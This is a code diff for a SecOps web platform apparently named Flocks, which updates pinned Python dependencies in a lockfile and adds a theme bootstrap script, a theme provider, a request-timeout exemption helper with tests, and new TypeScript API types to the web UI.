+    { url = "https://files.pythonhosted.org/packages/49/a0/24409c12217456df0bae7babe3b014e460b0b38a8e60753d6cb339f6556d/aiohttp-3.13.5-cp312-cp312-manylinux2014_ppc64le.manylinux_2_17_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:c2b2355dc094e5f7d45a7bb262fe7207aa0460b37a0d87027dcf21b5d890e7d5", size = 1781501, upload-time = "2026-03-31T21:57:46.285Z" },
+    { url = "https://files.pythonhosted.org/packages/98/9d/b65ec649adc5bccc008b0957a9a9c691070aeac4e41cea18559fef49958b/aiohttp-3.13.5-cp312-cp312-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:b38765950832f7d728297689ad78f5f2cf79ff82487131c4d26fe6ceecdc5f8e", size = 1878981, upload-time = "2026-03-31T21:57:48.734Z" },
+    { url = "https://files.pythonhosted.org/packages/57/d8/8d44036d7eb7b6a8ec4c5494ea0c8c8b94fbc0ed3991c1a7adf230df03bf/aiohttp-3.13.5-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:b18f31b80d5a33661e08c89e202edabf1986e9b49c42b4504371daeaa11b47c1", size = 1767934, upload-time = "2026-03-31T21:57:51.171Z" },
+    { url = "https://files.pythonhosted.org/packages/31/04/d3f8211f273356f158e3464e9e45484d3fb8c4ce5eb2f6fe9405c3273983/aiohttp-3.13.5-cp312-cp312-manylinux_2_31_riscv64.manylinux_2_39_riscv64.whl", hash = "sha256:33add2463dde55c4f2d9635c6ab33ce154e5ecf322bd26d09af95c5f81cfa286", size = 1566671, upload-time = "2026-03-31T21:57:53.326Z" },
+    { url = "https://files.pythonhosted.org/packages/41/db/073e4ebe00b78e2dfcacff734291651729a62953b48933d765dc513bf798/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:327cc432fdf1356fb4fbc6fe833ad4e9f6aacb71a8acaa5f1855e4b25910e4a9", size = 1705219, upload-time = "2026-03-31T21:57:55.385Z" },
+    { url = "https://files.pythonhosted.org/packages/48/45/7dfba71a2f9fd97b15c95c06819de7eb38113d2cdb6319669195a7d64270/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_armv7l.whl", hash = "sha256:7c35b0bf0b48a70b4cb4fc5d7bed9b932532728e124874355de1a0af8ec4bc88", size = 1743049, upload-time = "2026-03-31T21:57:57.341Z" },
+    { url = "https://files.pythonhosted.org/packages/18/71/901db0061e0f717d226386a7f471bb59b19566f2cae5f0d93874b017271f/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:df23d57718f24badef8656c49743e11a89fd6f5358fa8a7b96e728fda2abf7d3", size = 1749557, upload-time = "2026-03-31T21:57:59.626Z" },
+    { url = "https://files.pythonhosted.org/packages/08/d5/41eebd16066e59cd43728fe74bce953d7402f2b4ddfdfef2c0e9f17ca274/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_riscv64.whl", hash = "sha256:02e048037a6501a5ec1f6fc9736135aec6eb8a004ce48838cb951c515f32c80b", size = 1558931, upload-time = "2026-03-31T21:58:01.972Z" },
+    { url = "https://files.pythonhosted.org/packages/30/e6/4a799798bf05740e66c3a1161079bda7a3dd8e22ca392481d7a7f9af82a6/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:31cebae8b26f8a615d2b546fee45d5ffb76852ae6450e2a03f42c9102260d6fe", size = 1774125, upload-time = "2026-03-31T21:58:04.007Z" },
+    { url = "https://files.pythonhosted.org/packages/84/63/7749337c90f92bc2cb18f9560d67aa6258c7060d1397d21529b8004fcf6f/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:888e78eb5ca55a615d285c3c09a7a91b42e9dd6fc699b166ebd5dee87c9ccf14", size = 1732427, upload-time = "2026-03-31T21:58:06.337Z" },
+    { url = "https://files.pythonhosted.org/packages/98/de/cf2f44ff98d307e72fb97d5f5bbae3bfcb442f0ea9790c0bf5c5c2331404/aiohttp-3.13.5-cp312-cp312-win32.whl", hash = "sha256:8bd3ec6376e68a41f9f95f5ed170e2fcf22d4eb27a1f8cb361d0508f6e0557f3", size = 433534, upload-time = "2026-03-31T21:58:08.712Z" },
+    { url = "https://files.pythonhosted.org/packages/aa/ca/eadf6f9c8fa5e31d40993e3db153fb5ed0b11008ad5d9de98a95045bed84/aiohttp-3.13.5-cp312-cp312-win_amd64.whl", hash = "sha256:110e448e02c729bcebb18c60b9214a87ba33bac4a9fa5e9a5f139938b56c6cb1", size = 460446, upload-time = "2026-03-31T21:58:10.945Z" },
 ]
 
 [[package]]
@@ -306,14 +306,14 @@ wheels = [
 
 [[package]]
 name = "click"
-version = "8.3.1"
+version = "8.1.8"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "colorama", marker = "sys_platform == 'win32'" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/3d/fa/656b739db8587d7b5dfa22e22ed02566950fbfbcdc20311993483657a5c0/click-8.3.1.tar.gz", hash = "sha256:12ff4785d337a1bb490bb7e9c2b1ee5da3112e94a8622f26a6c77f5d2fc6842a", size = 295065, upload-time = "2025-11-15T20:45:42.706Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/b9/2e/0090cbf739cee7d23781ad4b89a9894a41538e4fcf4c31dcdd705b78eb8b/click-8.1.8.tar.gz", hash = "sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a", size = 226593, upload-time = "2024-12-21T18:38:44.339Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/98/78/01c019cdb5d6498122777c1a43056ebb3ebfeef2076d9d026bfe15583b2b/click-8.3.1-py3-none-any.whl", hash = "sha256:981153a64e25f12d547d3426c367a4857371575ee7ad18df2a6183ab0545b2a6", size = 108274, upload-time = "2025-11-15T20:45:41.139Z" },
+    { url = "https://files.pythonhosted.org/packages/7e/d4/7ebdbd03970677812aac39c869717059dbb71a4cfc033ca6e5221787892c/click-8.1.8-py3-none-any.whl", hash = "sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2", size = 98188, upload-time = "2024-12-21T18:38:41.666Z" },
 ]
 
 [[package]]
@@ -537,7 +537,7 @@ wheels = [
 
 [[package]]
 name = "flocks"
-version = "2026.6.10"
+version = "2026.6.17"
 source = { editable = "." }
 dependencies = [
     { name = "aiofiles" },
@@ -629,7 +629,7 @@ requires-dist = [
     { name = "jsonschema", specifier = ">=4.20.0" },
     { name = "langfuse" },
     { name = "lark-oapi", specifier = ">=1.3.0" },
-    { name = "litellm", specifier = ">=1.30.0" },
+    { name = "litellm", specifier = "==1.83.7" },
     { name = "lsprotocol", specifier = ">=2023.0.0" },
     { name = "markdown", specifier = ">=3.10.2" },
     { name = "markitdown", specifier = ">=0.1.5" },
@@ -656,7 +656,7 @@ requires-dist = [
     { name = "tiktoken", specifier = ">=0.12.0" },
     { name = "toml", specifier = ">=0.10.2" },
     { name = "tree-sitter", specifier = ">=0.21.0" },
-    { name = "typer", specifier = ">=0.9.0" },
+    { name = "typer", specifier = ">=0.9.0,<0.24.0" },
     { name = "ulid-py", specifier = ">=1.1.0" },
     { name = "uvicorn", extras = ["standard"], specifier = ">=0.27.0" },
     { name = "watchdog", specifier = ">=4.0.0" },
@@ -924,14 +924,14 @@ wheels = [
 
 [[package]]
 name = "importlib-metadata"
-version = "8.7.1"
+version = "8.5.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "zipp" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/f3/49/3b30cad09e7771a4982d9975a8cbf64f00d4a1ececb53297f1d9a7be1b10/importlib_metadata-8.7.1.tar.gz", hash = "sha256:49fef1ae6440c182052f407c8d34a68f72efc36db9ca90dc0113398f2fdde8bb", size = 57107, upload-time = "2025-12-21T10:00:19.278Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/cd/12/33e59336dca5be0c398a7482335911a33aa0e20776128f038019f1a95f1b/importlib_metadata-8.5.0.tar.gz", hash = "sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7", size = 55304, upload-time = "2024-09-11T14:56:08.937Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/fa/5e/f8e9a1d23b9c20a551a8a02ea3637b4642e22c2626e3a13a9a29cdea99eb/importlib_metadata-8.7.1-py3-none-any.whl", hash = "sha256:5a1f80bf1daa489495071efbb095d75a634cf28a8bc299581244063b53176151", size = 27865, upload-time = "2025-12-21T10:00:18.329Z" },
+    { url = "https://files.pythonhosted.org/packages/a0/d9/a1e041c5e7caa9a05c925f4bdbdfb7f006d1f74996af53467bc394c97be7/importlib_metadata-8.5.0-py3-none-any.whl", hash = "sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b", size = 26514, upload-time = "2024-09-11T14:56:07.019Z" },
 ]
 
 [[package]]
@@ -1027,7 +1027,7 @@ wheels = [
 
 [[package]]
 name = "jsonschema"
-version = "4.26.0"
+version = "4.23.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "attrs" },
@@ -1035,9 +1035,9 @@ dependencies = [
     { name = "referencing" },
     { name = "rpds-py" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/b3/fc/e067678238fa451312d4c62bf6e6cf5ec56375422aee02f9cb5f909b3047/jsonschema-4.26.0.tar.gz", hash = "sha256:0c26707e2efad8aa1bfc5b7ce170f3fccc2e4918ff85989ba9ffa9facb2be326", size = 366583, upload-time = "2026-01-07T13:41:07.246Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/38/2e/03362ee4034a4c917f697890ccd4aec0800ccf9ded7f511971c75451deec/jsonschema-4.23.0.tar.gz", hash = "sha256:d71497fef26351a33265337fa77ffeb82423f3ea21283cd9467bb03999266bc4", size = 325778, upload-time = "2024-07-08T18:40:05.546Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/69/90/f63fb5873511e014207a475e2bb4e8b2e570d655b00ac19a9a0ca0a385ee/jsonschema-4.26.0-py3-none-any.whl", hash = "sha256:d489f15263b8d200f8387e64b4c3a75f06629559fb73deb8fdfb525f2dab50ce", size = 90630, upload-time = "2026-01-07T13:41:05.306Z" },
+    { url = "https://files.pythonhosted.org/packages/69/4a/4f9dbeb84e8850557c02365a0eee0649abe5eb1d84af92a25731c6c0f922/jsonschema-4.23.0-py3-none-any.whl", hash = "sha256:fbadb6f8b144a8f8cf9f0b89ba94501d143e50411a1278633f56a7acf7fd5566", size = 88462, upload-time = "2024-07-08T18:40:00.165Z" },
 ]
 
 [[package]]
@@ -1110,7 +1110,7 @@ wheels = [
 
 [[package]]
 name = "litellm"
-version = "1.82.6"
+version = "1.83.7"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "aiohttp" },
@@ -1126,9 +1126,9 @@ dependencies = [
     { name = "tiktoken" },
     { name = "tokenizers" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/29/75/1c537aa458426a9127a92bc2273787b2f987f4e5044e21f01f2eed5244fd/litellm-1.82.6.tar.gz", hash = "sha256:2aa1c2da21fe940c33613aa447119674a3ad4d2ad5eb064e4d5ce5ee42420136", size = 17414147, upload-time = "2026-03-22T06:36:00.452Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/77/2b/b58bf6bbcbc3d0e55d0a84fdf9128e5b1436517f46fce89b1cd8948ebb81/litellm-1.83.7.tar.gz", hash = "sha256:e2f2cb99df2e2b2eab63f1354faa45c88dd7c8d40c18eb648afb1b349c689633", size = 17791694, upload-time = "2026-04-13T17:35:01.606Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/02/6c/5327667e6dbe9e98cbfbd4261c8e91386a52e38f41419575854248bbab6a/litellm-1.82.6-py3-none-any.whl", hash = "sha256:164a3ef3e19f309e3cabc199bef3d2045212712fefdfa25fc7f75884a5b5b205", size = 15591595, upload-time = "2026-03-22T06:35:56.795Z" },
+    { url = "https://files.pythonhosted.org/packages/75/80/caeb4cdcad96451ba83ad3ba2a9da08b1e1a915fa845c489f56ea044488b/litellm-1.83.7-py3-none-any.whl", hash = "sha256:5784a1d9a9a4a8acd6ca1e347003a5e2e1b3c749b4d41e7da4904577adade111", size = 16069807, upload-time = "2026-04-13T17:34:58.36Z" },
 ]
 
 [[package]]
@@ -1394,7 +1394,7 @@ wheels = [
 
 [[package]]
 name = "openai"
-version = "2.29.0"
+version = "2.30.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "anyio" },
@@ -1406,9 +1406,9 @@ dependencies = [
     { name = "tqdm" },
     { name = "typing-extensions" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/b4/15/203d537e58986b5673e7f232453a2a2f110f22757b15921cbdeea392e520/openai-2.29.0.tar.gz", hash = "sha256:32d09eb2f661b38d3edd7d7e1a2943d1633f572596febe64c0cd370c86d52bec", size = 671128, upload-time = "2026-03-17T17:53:49.599Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/88/15/52580c8fbc16d0675d516e8749806eda679b16de1e4434ea06fb6feaa610/openai-2.30.0.tar.gz", hash = "sha256:92f7661c990bda4b22a941806c83eabe4896c3094465030dd882a71abe80c885", size = 676084, upload-time = "2026-03-25T22:08:59.96Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/d0/b1/35b6f9c8cf9318e3dbb7146cc82dab4cf61182a8d5406fc9b50864362895/openai-2.29.0-py3-none-any.whl", hash = "sha256:b7c5de513c3286d17c5e29b92c4c98ceaf0d775244ac8159aeb1bddf840eb42a", size = 1141533, upload-time = "2026-03-17T17:53:47.348Z" },
+    { url = "https://files.pythonhosted.org/packages/2a/9e/5bfa2270f902d5b92ab7d41ce0475b8630572e71e349b2a4996d14bdda93/openai-2.30.0-py3-none-any.whl", hash = "sha256:9a5ae616888eb2748ec5e0c5b955a51592e0b201a11f4262db920f2a78c5231d", size = 1146656, upload-time = "2026-03-25T22:08:58.2Z" },
 ]
 
 [[package]]
@@ -1863,11 +1863,11 @@ wheels = [
 
 [[package]]
 name = "python-dotenv"
-version = "1.2.2"
+version = "1.0.1"
 source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/82/ed/0301aeeac3e5353ef3d94b6ec08bbcabd04a72018415dcb29e588514bba8/python_dotenv-1.2.2.tar.gz", hash = "sha256:2c371a91fbd7ba082c2c1dc1f8bf89ca22564a087c2c287cd9b662adde799cf3", size = 50135, upload-time = "2026-03-01T16:00:26.196Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/bc/57/e84d88dfe0aec03b7a2d4327012c1627ab5f03652216c63d49846d7a6c58/python-dotenv-1.0.1.tar.gz", hash = "sha256:e324ee90a023d808f1959c46bcbc04446a10ced277783dc6ee09987c37ec10ca", size = 39115, upload-time = "2024-01-23T06:33:00.505Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/0b/d7/1959b9648791274998a9c3526f6d0ec8fd2233e4d4acce81bbae76b44b2a/python_dotenv-1.2.2-py3-none-any.whl", hash = "sha256:1d8214789a24de455a8b8bd8ae6fe3c6b69a5e3d64aa8a8e5d68e694bbcb285a", size = 22101, upload-time = "2026-03-01T16:00:25.09Z" },
+    { url = "https://files.pythonhosted.org/packages/6a/3e/b68c118422ec867fa7ab88444e1274aa40681c606d59ac27de5a5588f082/python_dotenv-1.0.1-py3-none-any.whl", hash = "sha256:f7b63ef50f1b690dddf550d03497b66d609393b40b564ed0d674909a68ebf16a", size = 19863, upload-time = "2024-01-23T06:32:58.246Z" },
 ]
 
 [[package]]
@@ -2308,7 +2308,7 @@ wheels = [
 
 [[package]]
 name = "typer"
-version = "0.24.1"
+version = "0.23.1"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "annotated-doc" },
@@ -2316,9 +2316,9 @@ dependencies = [
     { name = "rich" },
     { name = "shellingham" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/f5/24/cb09efec5cc954f7f9b930bf8279447d24618bb6758d4f6adf2574c41780/typer-0.24.1.tar.gz", hash = "sha256:e39b4732d65fbdcde189ae76cf7cd48aeae72919dea1fdfc16593be016256b45", size = 118613, upload-time = "2026-02-21T16:54:40.609Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/fd/07/b822e1b307d40e263e8253d2384cf98c51aa2368cc7ba9a07e523a1d964b/typer-0.23.1.tar.gz", hash = "sha256:2070374e4d31c83e7b61362fd859aa683576432fd5b026b060ad6b4cd3b86134", size = 120047, upload-time = "2026-02-13T10:04:30.984Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/4a/91/48db081e7a63bb37284f9fbcefda7c44c277b18b0e13fbc36ea2335b71e6/typer-0.24.1-py3-none-any.whl", hash = "sha256:112c1f0ce578bfb4cab9ffdabc68f031416ebcc216536611ba21f04e9aa84c9e", size = 56085, upload-time = "2026-02-21T16:54:41.616Z" },
+    { url = "https://files.pythonhosted.org/packages/d5/91/9b286ab899c008c2cb05e8be99814807e7fbbd33f0c0c960470826e5ac82/typer-0.23.1-py3-none-any.whl", hash = "sha256:3291ad0d3c701cbf522012faccfbb29352ff16ad262db2139e6b01f15781f14e", size = 56813, upload-time = "2026-02-13T10:04:32.008Z" },
 ]
 
 [[package]]
diff --git a/webui/index.html b/webui/index.html
index ac6bcb34c..c5a921e2d 100644
--- a/webui/index.html
+++ b/webui/index.html
@@ -5,6 +5,22 @@
     <link rel="icon" type="image/svg+xml" href="/favicon.svg" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     <title>Flocks - AI Native SecOps Platform</title>
+    <script>
+      // Inline theme bootstrap: reads the stored 'flocks_theme' value (falling back
+      // to the OS preference) and applies it to <html> while <head> is parsed.
+      (function () {
+        var root = document.documentElement;
+        try {
+          var storedTheme = localStorage.getItem('flocks_theme');
+          var systemDark = window.matchMedia('(prefers-color-scheme: dark)').matches;
+          var useDark = storedTheme === 'dark' || (!storedTheme && systemDark);
+          if (useDark) root.classList.add('dark');
+          root.style.colorScheme = useDark ? 'dark' : 'light';
+        } catch (error) {
+          root.style.colorScheme = 'light'; // any failure above falls back to light
+        }
+      })();
+    </script>
   </head>
   <body>
     <div id="root"></div>
diff --git a/webui/src/App.tsx b/webui/src/App.tsx
index c7a1f44a9..21613e02a 100644
--- a/webui/src/App.tsx
+++ b/webui/src/App.tsx
@@ -4,17 +4,20 @@ import { ToastProvider } from './components/common/Toast'
 import { ConfirmProvider } from './components/common/ConfirmDialog'
 import { BackendStatusBanner } from './components/common/BackendStatusBanner'
 import { AuthProvider } from './contexts/AuthContext'
+import { ThemeProvider } from './contexts/ThemeContext'
 
 export default function App() {
   return (
     <ToastProvider>
       <ConfirmProvider>
-        <BrowserRouter>
-          <AuthProvider>
-            <BackendStatusBanner />
-            <Routes />
-          </AuthProvider>
-        </BrowserRouter>
+        <ThemeProvider>
+          <BrowserRouter>
+            <AuthProvider>
+              <BackendStatusBanner />
+              <Routes />
+            </AuthProvider>
+          </BrowserRouter>
+        </ThemeProvider>
       </ConfirmProvider>
     </ToastProvider>
   )
diff --git a/webui/src/api/client.test.ts b/webui/src/api/client.test.ts
index 0e5dad403..a8050008c 100644
--- a/webui/src/api/client.test.ts
+++ b/webui/src/api/client.test.ts
@@ -1,5 +1,5 @@
 import { describe, expect, it } from 'vitest';
-import { resolveApiBaseURL } from './client';
+import { resolveApiBaseURL, shouldDisableApiTimeout } from './client';
 
 describe('resolveApiBaseURL', () => {
   it('returns the configured URL when no current origin is provided', () => {
@@ -19,3 +19,30 @@ describe('resolveApiBaseURL', () => {
     expect(resolveApiBaseURL('http://10.0.0.8:8000', 'http://localhost:5173')).toBe('http://10.0.0.8:8000');
   });
 });
+
+describe('shouldDisableApiTimeout', () => {
+  it('disables timeout for session interaction mutations', () => {
+    expect(shouldDisableApiTimeout('/api/session', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/message', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_async', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1', 'patch')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1', 'delete')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/prompt_queue/item-1/run_now', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/command', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/abort', 'post')).toBe(true);
+  });
+
+  it('disables timeout for question replies and rejects', () => {
+    expect(shouldDisableApiTimeout('/api/question/question-1/reply', 'post')).toBe(true);
+    expect(shouldDisableApiTimeout('/api/question/question-1/reject', 'post')).toBe(true);
+  });
+
+  it('keeps timeout for normal read endpoints', () => {
+    expect(shouldDisableApiTimeout('/api/session', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/session/sess-1', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/session/sess-1/message', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/question/session/sess-1/pending', 'get')).toBe(false);
+    expect(shouldDisableApiTimeout('/api/workflow', 'post')).toBe(false);
+  });
+});
diff --git a/webui/src/api/client.ts b/webui/src/api/client.ts
index 2138272dd..c3970fdc1 100644
--- a/webui/src/api/client.ts
+++ b/webui/src/api/client.ts
@@ -1,5 +1,7 @@
 import axios from 'axios';
 
+export const DEFAULT_API_TIMEOUT_MS = 30000;
+
 function isLoopbackHostname(hostname: string): boolean {
   return hostname === 'localhost' || hostname === '127.0.0.1' || hostname === '::1';
 }
@@ -37,17 +39,55 @@ const baseURL = resolveApiBaseURL(
 
 export const apiClient = axios.create({
   baseURL,
-  timeout: 30000, // 30 seconds - 缩短超时时间以更快发现连接问题
+  timeout: DEFAULT_API_TIMEOUT_MS, // 30 seconds - shortened timeout so connection problems surface sooner
   withCredentials: true,
   headers: {
     'Content-Type': 'application/json',
   },
 });
 
+/**
+ * Report whether a request should run without the client's default timeout.
+ *
+ * True for POST /api/session, for POST/PATCH/DELETE requests under
+ * /api/session/ that address message, prompt_async, prompt_queue, command or
+ * abort, and for POST /api/question/.../reply|reject. False otherwise.
+ */
+export function shouldDisableApiTimeout(url?: string, method?: string): boolean {
+  if (!url) return false;
+
+  const verb = (method || 'get').toLowerCase();
+  let path: string;
+  try {
+    // The placeholder base is only used to resolve relative URLs.
+    path = new URL(url, 'http://flocks.local').pathname;
+  } catch {
+    path = url.split('?')[0] || url;
+  }
+
+  // Exact collection path: only creating a session is exempt.
+  if (path === '/api/session') return verb === 'post';
+
+  if (path.startsWith('/api/session/')) {
+    if (!['post', 'patch', 'delete'].includes(verb)) return false;
+    if (path.includes('/prompt_queue')) return true;
+    const interactionSuffixes = ['/message', '/prompt_async', '/command', '/abort'];
+    return interactionSuffixes.some((suffix) => path.endsWith(suffix));
+  }
+
+  if (verb === 'post' && path.startsWith('/api/question/')) {
+    return path.endsWith('/reply') || path.endsWith('/reject');
+  }
+
+  return false;
+}
+
 // 请求拦截器
 apiClient.interceptors.request.use(
   (config) => {
-    // 可以在这里添加认证 token 等
+    if (shouldDisableApiTimeout(config.url, config.method)) {
+      config.timeout = 0;
+    }
     return config;
   },
   (error) => {
diff --git a/webui/src/api/device.ts b/webui/src/api/device.ts
index ad0ba1e26..1944c58ce 100644
--- a/webui/src/api/device.ts
+++ b/webui/src/api/device.ts
@@ -91,6 +91,8 @@ export interface DeviceTestResult {
 }
 
 export interface DeviceTestRequest {
+  /** Unsaved form fields used only for this probe. */
+  fields?: Record<string, string>;
   /** Override the persisted base_url for this probe only (typically the
    *  current value in the form, before it has been saved). */
   base_url?: string;
@@ -173,6 +175,9 @@ export const deviceAPI = {
   listTemplates: (params?: { refresh?: boolean }) =>
     client.get<DeviceTemplate[]>('/api/devices/templates', { params }),
 
+  sync: (params?: { refresh?: boolean }) =>
+    client.post<{ created: number }>('/api/devices/sync', null, { params }),
+
   createCustomTemplate: (data: CustomDeviceTemplateCreate) =>
     client.post<DeviceTemplate>('/api/devices/templates/custom', data),
 
diff --git a/webui/src/api/session.ts b/webui/src/api/session.ts
index 9565d4f82..0123d0f44 100644
--- a/webui/src/api/session.ts
+++ b/webui/src/api/session.ts
@@ -20,6 +20,8 @@ export interface QueuedPrompt {
   agent?: string | null;
   model?: Record<string, unknown> | null;
   variant?: string | null;
+  display_text?: string | null;
+  displayText?: string | null;
   messageID?: string | null;
   status: 'pending' | 'executing' | string;
   createdAt: number;
@@ -31,6 +33,41 @@ export interface PromptQueueResponse {
   items: QueuedPrompt[];
 }
 
+export interface ContextUsageSegment {
+  key: string;
+  tokens: number;
+  included: boolean;
+  source?: 'observed' | 'estimated' | string;
+}
+
+export interface ContextUsageSnapshot {
+  sessionID: string;
+  usedTokens: number;
+  contextWindow: number;
+  percent: number;
+  source: 'observed' | 'estimated' | string;
+  lastMessageID?: string | null;
+  observedTokens?: number | null;
+  estimatedTokens: number;
+  compactedTokens: number;
+  providerID?: string | null;
+  modelID?: string | null;
+  segments: ContextUsageSegment[];
+  excludedSegments: ContextUsageSegment[];
+}
+
+export interface SessionGoalState {
+  status: 'active' | 'completed' | 'blocked' | 'paused';
+  objective: string;
+  reason?: string | null;
+}
+
+export interface SessionResponse {
+  id: string;
+  goal?: SessionGoalState | null;
+  [key: string]: unknown;
+}
+
 export interface SessionListParams {
   limit?: number;
   offset?: number;
@@ -61,7 +98,7 @@ export const sessionApi = {
   /**
    * 获取单个会话
    */
-  get: async (sessionId: string) => {
+  get: async (sessionId: string): Promise<SessionResponse> => {
     const response = await client.get(`/api/session/${sessionId}`);
     return response.data;
   },
@@ -122,6 +159,11 @@ export const sessionApi = {
     return response.data;
   },
 
+  getContextUsage: async (sessionId: string): Promise<ContextUsageSnapshot> => {
+    const response = await client.get(`/api/session/${sessionId}/context-usage`);
+    return response.data;
+  },
+
   /**
    * 发送消息
    */
@@ -145,6 +187,7 @@ export const sessionApi = {
     agent?: string;
     model?: Record<string, unknown>;
     variant?: string;
+    displayText?: string;
   }) => {
     const response = await client.post(`/api/session/${sessionId}/prompt_queue`, data);
     return response.data;
diff --git a/webui/src/api/skill.ts b/webui/src/api/skill.ts
index b21c1b583..8537aa8c6 100644
--- a/webui/src/api/skill.ts
+++ b/webui/src/api/skill.ts
@@ -23,6 +23,7 @@ export interface Skill {
   source?: string;
   content?: string;
   category?: string;
+  ui_hidden?: boolean;
   disabled?: boolean;
   // Eligibility
   eligible?: boolean;
diff --git a/webui/src/api/workflow.ts b/webui/src/api/workflow.ts
index 8d4eecd48..b081435f9 100644
--- a/webui/src/api/workflow.ts
+++ b/webui/src/api/workflow.ts
@@ -163,6 +163,7 @@ export interface WorkflowTriggerPlugin {
 export interface WorkflowJSON {
   version?: string;
   name?: string;
+  nameI18n?: Record<string, string>;
   start: string;
   nodes: WorkflowNode[];
   edges: WorkflowEdge[];
@@ -173,8 +174,10 @@ export interface WorkflowJSON {
 export interface Workflow {
   id: string;
   name: string;
+  nameI18n?: Record<string, string>;
   description?: string;
   markdownContent?: string;
+  editMarkdownContent?: string;
   category: string;
   workflowJson: WorkflowJSON;
   status: 'draft' | 'active' | 'archived';
@@ -225,6 +228,18 @@ export interface WorkflowExecution {
   currentNodeType?: string;
   currentPhase?: string;
   currentStepIndex?: number;
+  stepCount?: number;
+  stepLogOffset?: number;
+  stepLogLimit?: number;
+  stepLogTotal?: number;
+  loopProgress?: {
+    loop_node_id?: string;
+    iteration?: number;
+    total_iterations?: number;
+    current_item?: string;
+    current_inner_node_id?: string;
+    global_step_index?: number;
+  };
 }
 
 export interface WorkflowNodeExecution {
@@ -251,6 +266,35 @@ export interface WorkflowService {
 
 export type WorkflowServiceDriver = 'local' | 'docker';
 
+export interface WorkflowIntegrationConfig {
+  version: number;
+  kind: string;
+  workflow: {
+    id: string;
+    name?: string;
+    category?: string;
+    source?: string;
+  };
+  updatedAt: number;
+  publish: Record<string, any>;
+  triggers: WorkflowTrigger[];
+  [key: string]: any;
+}
+
+export interface WorkflowIntegrationConfigResponse {
+  ok?: boolean;
+  exists?: boolean;
+  path: string;
+  storageKey?: string;
+  source?: 'storage' | 'file_migrated' | 'generated' | string;
+  config: WorkflowIntegrationConfig;
+  runtime?: {
+    publish?: Record<string, any>;
+    triggers?: WorkflowTriggerRecord[];
+    [key: string]: any;
+  };
+}
+
 /** Saved syslog listener config (per workflow). */
 export interface SyslogConfig {
   workflowId?: string;
@@ -303,6 +347,7 @@ export interface WorkflowPollerConfig {
   workflowId?: string;
   enabled?: boolean;
   intervalSeconds?: number;
+  cronExpression?: string | null;
   timeoutSeconds?: number;
   noOverlap?: boolean;
   inputs?: Record<string, any>;
@@ -353,6 +398,8 @@ export const workflowAPI = {
     description?: string;
     category?: string;
     workflowJson?: WorkflowJSON;
+    markdownContent?: string;
+    editMarkdownContent?: string;
     status?: 'draft' | 'active' | 'archived';
   }) =>
     client.put<Workflow>(`/api/workflow/${id}`, data),
@@ -373,8 +420,12 @@ export const workflowAPI = {
   getHistory: (id: string, params?: { limit?: number; triggerId?: string; triggerType?: string }) =>
     client.get<WorkflowExecution[]>(`/api/workflow/${id}/history`, { params }),
   
-  getExecution: (workflowId: string, execId: string) =>
-    client.get<WorkflowExecution>(`/api/workflow/${workflowId}/history/${execId}`),
+  getExecution: (
+    workflowId: string,
+    execId: string,
+    params?: { stepOffset?: number; stepLimit?: number },
+  ) =>
+    client.get<WorkflowExecution>(`/api/workflow/${workflowId}/history/${execId}`, { params }),
 
